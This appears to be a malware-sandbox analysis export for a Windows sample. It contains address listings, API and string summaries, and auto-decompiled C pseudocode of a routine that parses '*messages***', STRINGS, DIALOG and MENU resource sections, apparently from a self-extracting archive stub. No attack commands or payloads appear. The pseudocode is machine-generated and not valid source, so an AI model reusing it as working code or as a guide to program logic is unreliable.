0x00000000
0x0007c1a4
0x00000000
0x0007c340
0x0007c341
0x0007c346
0x0007c348
0x0007c34a
0x0007c34b
0x0007c34b
0x00000000
0x0007c381
0x0007c388
0x0007c38a
0x0007c38a
0x0007c38c
0x0007c3bb
0x0007c3bb
0x0007c3c1
0x00000000
0x0007c3c1
0x0007c38e
0x0007c38e
0x0007c391
0x0007c3aa
0x0007c3b0
0x0007c3b0
0x00000000
0x0007c3b0
0x0007c393
0x0007c393
0x0007c396
0x00000000
0x00000000
0x0007c398
0x0007c398
0x0007c39b
0x00000000
0x00000000
0x0007c3a1
0x00000000
0x00000000
0x0007c40e
0x0007c410
0x0007c417
0x0007c418
0x0007c41e
0x0007c426
0x0007c4ca
0x0007c4ca
0x0007c4ce
0x0007c4e5
0x0007c4e5
0x0007c4e9
0x0007c4ef
0x0007c4f2
0x0007c4f8
0x0007c4fa
0x0007c4fb
0x0007c4fc
0x0007c4fd
0x0007c500
0x0007c500
0x0007c4f2
0x00000000
0x0007c4e9
0x0007c4d0
0x0007c4d3
0x00000000
0x00000000
0x0007c4d9
0x0007c4db
0x0007c4dc
0x0007c4dd
0x0007c4e0
0x00000000
0x0007c4e0
0x0007c42c
0x0007c432
0x0007c434
0x0007c435
0x0007c43a
0x0007c43b
0x0007c43c
0x0007c43e
0x00000000
0x00000000
0x0007c444
0x0007c444
0x0007c447
0x0007c44a
0x0007c44a
0x0007c44c
0x0007c44f
0x0007c455
0x0007c457
0x0007c458
0x0007c45e
0x0007c45f
0x0007c464
0x0007c466
0x0007c468
0x00000000
0x00000000
0x0007c46a
0x0007c472
0x00000000
0x00000000
0x0007c479
0x0007c480
0x0007c485
0x0007c48c
0x0007c48e
0x0007c490
0x0007c497
0x0007c49c
0x0007c49e
0x0007c4a0
0x0007c4a2
0x0007c4a2
0x0007c4a8
0x0007c4af
0x0007c4b4
0x0007c4b6
0x0007c4b8
0x0007c4ba
0x0007c4ba
0x0007c4bb
0x0007c4bd
0x0007c4c3
0x0007c4c4
0x0007c4c4
0x0007c4c7
0x00000000
0x00000000
0x0007c534
0x0007c537
0x0007c6b8
0x0007c6b8
0x0007c6bb
0x0007c6c1
0x0007c6c8
0x0007c6ca
0x0007c6ca
0x0007c6d4
0x0007c6d4
0x00000000
0x0007c6bb
0x0007c53d
0x0007c543
0x0007c551
0x0007c55d
0x0007c55f
0x0007c561
0x0007c566
0x0007c566
0x0007c57e
0x0007c58b
0x0007c590
0x0007c592
0x00000000
0x00000000
0x0007c564
0x0007c564
0x0007c565
0x0007c565
0x0007c59e
0x0007c5a4
0x0007c5ac
0x00000000
0x00000000
0x0007c5b2
0x0007c5b9
0x00000000
0x00000000
0x0007c5bf
0x0007c5c1
0x0007c5c8
0x0007c5ce
0x0007c5d0
0x0007c5d1
0x0007c5d6
0x0007c5d7
0x0007c5d8
0x0007c5da
0x0007c62e
0x0007c62e
0x0007c636
0x0007c644
0x0007c655
0x0007c663
0x0007c663
0x0007c66f
0x0007c674
0x0007c676
0x0007c686
0x0007c690
0x0007c695
0x0007c698
0x00000000
0x0007c69e
0x0007c6a3
0x0007c6a3
0x0007c6a5
0x0007c6ac
0x0007c6b2
0x00000000
0x0007c6b2
0x0007c698
0x0007c5dc
0x0007c5de
0x0007c5e0
0x0007c5e7
0x00000000
0x00000000
0x0007c5e9
0x0007c5eb
0x0007c5f1
0x0007c5f1
0x0007c5f5
0x00000000
0x00000000
0x0007c5f7
0x0007c5f8
0x0007c5fe
0x0007c601
0x0007c603
0x0007c606
0x00000000
0x00000000
0x00000000
0x0007c608
0x0007c615
0x0007c61f
0x0007c624
0x0007c624
0x0007c626
0x00000000
0x00000000
0x0007c6e0
0x0007c6e3
0x0007c6e5
0x0007c6ec
0x0007c6ee
0x0007c6f4
0x0007c6f5
0x0007c6fa
0x0007c6fb
0x0007c6fb
0x0007c700
0x0007c703
0x0007c709
0x0007c709
0x0007c70e
0x00000000
0x00000000
0x0007c71a
0x0007c71d
0x00000000
0x00000000
0x0007c723
0x0007c725
0x0007c72c
0x0007c734
0x0007c73a
0x0007c73f
0x0007c742
0x0007c777
0x0007c77c
0x0007c782
0x0007c783
0x0007c788
0x0007c744
0x0007c744
0x0007c747
0x0007c74d
0x0007c763
0x0007c768
0x0007c769
0x0007c76e
0x0007c74f
0x0007c74f
0x0007c754
0x0007c755
0x0007c75a
0x0007c75a
0x0007c74d
0x0007c78f
0x0007c791
0x0007c798
0x0007c7a6
0x0007c7ad
0x0007c7b2
0x0007c7b3
0x0007c7b4
0x0007c7b6
0x0007c7b7
0x0007c7be
0x0007c80e
0x0007c813
0x0007c815
0x00000000
0x00000000
0x0007c81b
0x0007c81d
0x0007c823
0x0007c82a
0x00000000
0x00000000
0x0007c82c
0x0007c82e
0x0007c82f
0x0007c82f
0x0007c832
0x0007c835
0x0007c83f
0x0007c83f
0x0007c841
0x0007c843
0x0007c84d
0x0007c852
0x0007c854
0x0007c892
0x0007c895
0x0007c895
0x0007c897
0x0007c898
0x0007c898
0x00000000
0x0007c898
0x0007c856
0x0007c858
0x0007c859
0x0007c85b
0x0007c85e
0x0007c873
0x0007c875
0x0007c876
0x0007c876
0x0007c879
0x0007c879
0x0007c87e
0x0007c87f
0x0007c885
0x0007c885
0x0007c886
0x0007c88b
0x0007c88c
0x0007c88d
0x00000000
0x0007c88d
0x0007c860
0x0007c867
0x0007c86a
0x0007c86b
0x00000000
0x0007c86b
0x0007c837
0x0007c839
0x0007c83a
0x0007c83d
0x00000000
0x00000000
0x00000000
0x0007c89a
0x0007c89a
0x0007c89d
0x0007c89d
0x0007c8a2
0x0007c8a4
0x0007c8a6
0x0007c8a6
0x0007c8a8
0x0007c8a8
0x00000000
0x0007c7c0
0x0007c7c7
0x0007c7d3
0x0007c7d9
0x0007c7da
0x0007c7db
0x0007c7e0
0x0007c7e3
0x0007c7e5
0x0007c7eb
0x0007c7ed
0x0007c7fb
0x0007c800
0x0007c801
0x0007c801
0x0007c8ab
0x0007c8ab
0x0007c8b3
0x0007c8b8
0x0007c8c2
0x0007c8c9
0x0007c8c9
0x0007c8d6
0x0007c8dd
0x0007c8e2
0x0007c8ea
0x0007c8f6
0x0007c8f6
0x0007c903
0x0007c908
0x0007c910
0x0007c91a
0x0007c927
0x0007c92e
0x0007c92e
0x0007c93a
0x0007c941
0x0007c946
0x0007c94e
0x0007c954
0x0007c955
0x0007c956
0x0007c958
0x0007c958
0x0007c96d
0x0007c972
0x0007c97e
0x0007c980
0x0007c991
0x0007c99e
0x00000000
0x0007c982
0x0007c98d
0x0007c98f
0x0007c9a3
0x0007c9a3
0x0007c9a5
0x0007c9ab
0x0007c9b1
0x0007c9bf
0x0007c9c4
0x0007c9c5
0x0007c9cd
0x0007c9d2
0x0007c9d9
0x0007c9df
0x0007c9e1
0x0007c9e7
0x0007c9ed
0x0007c9ef
0x0007c9f8
0x0007c9fb
0x0007c9fd
0x0007ca06
0x0007ca09
0x0007ca0f
0x0007ca12
0x0007ca1b
0x0007ca2a
0x0007ca2f
0x0007ca37
0x0007ca39
0x0007ca3a
0x0007ca40
0x0007ca41
0x0007ca43
0x0007ca48
0x0007ca48
0x00000000
0x0007ca37
0x00000000
0x0007c98f
0x0007c980
0x00000000
0x0007ca50
0x0007ca53
0x0007ca55
0x0007ca55
0x00000000
0x00000000
0x0007c3cd
0x0007c3d5
0x0007c3db
0x0007c3de
0x0007c402
0x0007c3e0
0x0007c3e0
0x0007c3e3
0x0007c3f6
0x0007c3e5
0x0007c3e5
0x0007c3e7
0x0007c3ec
0x0007c3ec
0x0007c3e3
0x00000000
0x00000000
0x0007c50a
0x0007c50b
0x0007c510
0x0007c510
0x0007c510
0x0007c513
0x0007c518
0x0007c51e
0x0007c51e
0x0007c524
0x0007c52a
0x0007c52a
0x00000000
0x00000000
0x0007be58
0x0007be58
0x0007be5d
0x0007be5e
0x0007be5f
0x0007be64
0x0007be6a
0x0007be6d
0x00000000
0x0007be6f
0x0007be6f
0x00000000
0x0007be6f
0x0007ca5c
0x0007ca5c
0x0007ca61
0x0007ca65
0x0007ca69
0x0007ca70
0x0007ca77
0x0007ca7a
0x0007ca7f
0x0007ca82
0x0007ca85
0x0007ca8f

APIs

__EH_prolog.LIBCMT ref: 0007BDFA

Part of subcall function 0007AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0007AAFE

SetWindowTextW.USER32(?,?), ref: 0007C127
_wcsrchr.LIBVCRUNTIME ref: 0007C2B1
GetDlgItem.USER32(?,00000066), ref: 0007C2EC
SetWindowTextW.USER32(00000000,?), ref: 0007C2FC
SendMessageW.USER32(00000000,00000143,00000000,000AA472), ref: 0007C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0007C335

Strings

ProgramFilesDir, xrefs: 0007C1FB
Software\Microsoft\Windows\CurrentVersion, xrefs: 0007C1D0
%s.%d.tmp, xrefs: 0007BFF6
<br>, xrefs: 0007C08A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 7bef823d2c163d8bbc435fd62cc938cd039795e848604c4c08194657f598c82d
Instruction ID: dc6c03dcff7b4ad40ce144afc52a5dfd13e1b46bba6feb52f9245893e87051a2
Opcode Fuzzy Hash: 7bef823d2c163d8bbc435fd62cc938cd039795e848604c4c08194657f598c82d
Instruction Fuzzy Hash: 37E19572D00519AAEF25EBA0DC45EEF77BCAF45711F00806AF509E3051EB789B848F65

Uniqueness

Uniqueness Score: -1.00%

Function 0006D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0006D341(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E0007E28C(E00091F25, _t394);
				E0007E360();
				_t200 = 0x5c;
				_push(0x42f8);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E000815E8(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E0006FE56(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E0006BC85(_t400, _t394 - 0x12dc))) = 0;
					E0006FE2E(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E00069619(_t394 - 0x2304);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E000699B0(_t394 - 0x2304, _t391) == 0) {
					L57:
					_t207 = E00069653(_t394 - 0x2304, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0x9e5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E00085A90(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0006CFB0);
						E00085A90(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E0006CF10);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E00069E40();
							_t298 = E00069BF0(_t394 - 0x2304, _t374, _t394 - 0x4304, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E00069D30(_t394 - 0x2304, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4304)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4304)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4304)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E00085EC0(_t394 - 0x4302 + _t388, 0x938ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x4300 + _t388;
									if( *((intOrPtr*)(_t394 - 0x4300 + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E00085808(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E00085EC0(_t394 - 0x4302 + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00069D30(_t394 - 0x2304, _t394, _t385, _t374, _t320);
						_push(0x200002);
						_t386 = E000835D3(_t394 - 0x2304);
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E00069BF0(_t394 - 0x2304, _t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E000835D3(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E0007137A(_t386, _t216, _t334 + 1);
							L000835CE(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E0006FDFB(_t394 - 0x14c, 0x938f4, 0x64);
							_push(0x20002);
							_t222 = E000835D3(0);
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E0006CE72(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L000835CE( *(_t394 - 0x1c));
									L000835CE( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0xa0f94 =  *((intOrPtr*)(_t391 + 0x28));
										E00085A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E0006D070);
										E00085A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E0006D0A0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00073781(_t391 + 0x3c, _t375, _t320);
										E00073781(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E0006CE72(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E0006FCBF( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E0006FE56(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E00085885(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E00071596(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E0006FDFB(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E0006FDD4(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E0006FDFB(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E000858D9(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0006D050);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0x9e150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E000835B3( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E00085808(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E00071596(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E0006DD6B(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E000835E9(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E0006FDFB(_t394 - 0x14c, 0x938f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L000835CE(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00073781(_t391, _t374, _t384);
						E00073781(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0x9e5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}

0x0006d341
0x0006d341
0x0006d346
0x0006d350
0x0006d35a
0x0006d35b
0x0006d35c
0x0006d35f
0x0006d361
0x0006d364
0x0006d367
0x0006d36d
0x0006d36f
0x0006d372
0x0006d378
0x0006d3b4
0x0006d37a
0x0006d382
0x0006d39a
0x0006d3a4
0x0006d3a4
0x0006d3bf
0x0006d3c4
0x0006d3cc
0x0006d3cf
0x0006d3dd
0x0006d7a0
0x0006d7a6
0x0006d7b1
0x0006d7bb
0x0006d3e3
0x0006d3e3
0x0006d3e5
0x0006d3eb
0x0006d409
0x0006d415
0x0006d427
0x0006d42c
0x0006d42f
0x0006d432
0x0006d435
0x0006d438
0x0006d43b
0x0006d44f
0x0006d464
0x0006d469
0x0006d46c
0x0006d46e
0x0006d46e
0x0006d471
0x0006d476
0x0006d535
0x0006d535
0x0006d538
0x0006d53b
0x0006d54c
0x0006d554
0x0006d555
0x0006d558
0x0006d55d
0x00000000
0x00000000
0x0006d563
0x0006d566
0x00000000
0x00000000
0x00000000
0x0006d566
0x00000000
0x0006d47c
0x0006d484
0x0006d4af
0x0006d4b1
0x0006d4ba
0x0006d4e5
0x0006d4ed
0x0006d519
0x0006d519
0x0006d51d
0x00000000
0x00000000
0x0006d51f
0x00000000
0x0006d4f9
0x0006d509
0x0006d50e
0x0006d513
0x00000000
0x00000000
0x00000000
0x0006d513
0x0006d4ed
0x0006d4c2
0x0006d4c8
0x0006d4d9
0x0006d4de
0x0006d4e3
0x0006d527
0x00000000
0x0006d527
0x0006d4e3
0x00000000
0x0006d490
0x0006d4a0
0x0006d4a5
0x0006d4aa
0x0006d52b
0x0006d52b
0x0006d52e
0x0006d530
0x00000000
0x0006d530
0x0006d4ac
0x00000000
0x0006d4ac
0x0006d484
0x0006d47c
0x0006d575
0x0006d578
0x0006d57d
0x0006d587
0x0006d589
0x0006d58d
0x0006d58f
0x00000000
0x00000000
0x0006d5a6
0x0006d5ab
0x0006d5ae
0x0006d5b0
0x0006d5c0
0x0006d5c1
0x0006d5c6
0x0006d5ca
0x0006d5cc
0x00000000
0x00000000
0x0006d5d2
0x0006d5d5
0x0006d5d8
0x0006d5dc
0x0006d5e2
0x0006d5e7
0x0006d5eb
0x0006d5ee
0x0006d5f1
0x0006d5f1
0x0006d5f6
0x0006d5f8
0x0006d5fa
0x0006d5fa
0x0006d600
0x0006d610
0x0006d615
0x0006d61a
0x0006d61f
0x0006d623
0x0006d625
0x0006d633
